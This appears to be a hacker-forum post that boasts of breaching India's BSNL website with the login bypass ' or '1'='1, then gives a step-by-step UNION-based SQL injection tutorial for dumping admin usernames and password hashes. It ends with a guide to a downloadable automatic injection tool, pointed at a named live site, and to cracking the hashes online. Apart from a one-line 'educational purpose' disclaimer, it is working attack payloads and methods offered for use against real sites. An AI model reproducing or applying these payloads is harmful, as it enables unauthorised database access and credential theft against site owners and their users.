BSNL website HACKED by Ashish :)

BSNL Hacked by Simple SQLi .. Never thought this much BIG Govt. site will be vulnerabe to suach a Chindi thing :P

See Yourself.. 

go here
LINK 1

or
 
LINK 2

simply Enter

' or '1'='1

In password field

and

ENJOY..!

 

NOTE: It is for educational Purpose Only

SQL Injection Tutorial

SQL injection is a code that exploits a vulnerability in the database of a website.

Step 1
Firstly we will find a site which is vulnerable to SQLI .

So surf the site till u get to a URL which looks like this -:

www . prateek . com/articles/index.php?id=213

By this i mean a url ending with something like this "php?id=213"

Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.

Example = > www . prateek . com/articles/index.php?id=213'

If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.

Ok so now we will proceed to the next step

Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.

Example = >www . prateek . com/articles/index.php?id=213 order by 10--

So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.

Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--

Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.

So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--

As there were 5 columns we selected all the 5 columns.

When we execute this URL then on the page there will be number(s) displayed.

Like 2 or 3 or 4 etc.(This will not be greater than the number of columns)
Step 4
Now the number which appeared we have to remember it as we will use it in the next step.

Let us assume that number 3 appeared.

So now we will check the version of MYSQL with the help of this number

Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--


We used the @@version command to find out the version bieng used.

We replaced the number 3 (as we had got it in the last step) with @@version

Now after executing this the version number will be displayed.
Step 5
like = > 5.0.51a-community

Now as the version is above 5 its fine.

Now we will find the names of columns and tables.

This will be done by -:

Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--

After executing this , names of tables will be displayed.

It maybe anything .

Not them down. (choose names having admin , username , user etc in them)

Now we will find the names of columns

Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--

After executing this , names of columns will be displayed.

It maybe anything .

Not them down. (choose names having password, username , pass etc in them)

you might think what happens when you don't see a column like username or password?

then you have to do a little guessing.

Step 6
Now we will move further.

And place the names of columns and tables we noted down in the URL

Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--

In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).

Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)

Thanks for reading my tutorial hope you liked it.  

How to hack websites using Auto SQL I Helper

At the begening "SQLIHelperV.2.7" is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website.

This tool will do it all by itself. You only have to tell her what do and where to look.

http://uploading.com/files/VT1KFQHF/SQLIHelperV.2.7.rar.html

Lets start.

first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.

After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tut on how to hack this website.

Check if your website can be hacked by trying to go this address :

http://www.domain.com/article.php?id=&#391

you should get this message:

Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This mean that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7

and write the link :

http://www.domain.com/article.php?id=1

and press the inject button.

Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.

Make sure that the website support union otherwise the injection won't work.

Now select any element from the "database name" box and press the "Get tables" button

then select any element from the "table name" box and press the "Get columns" button

then select any elements you want from the "columns name" box and press "Dump Now"

After clicking "Dump Now" , u will see some hashes

Now copy the hash on a peace of paper and go to this website:

http://www.md5crack.com/

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.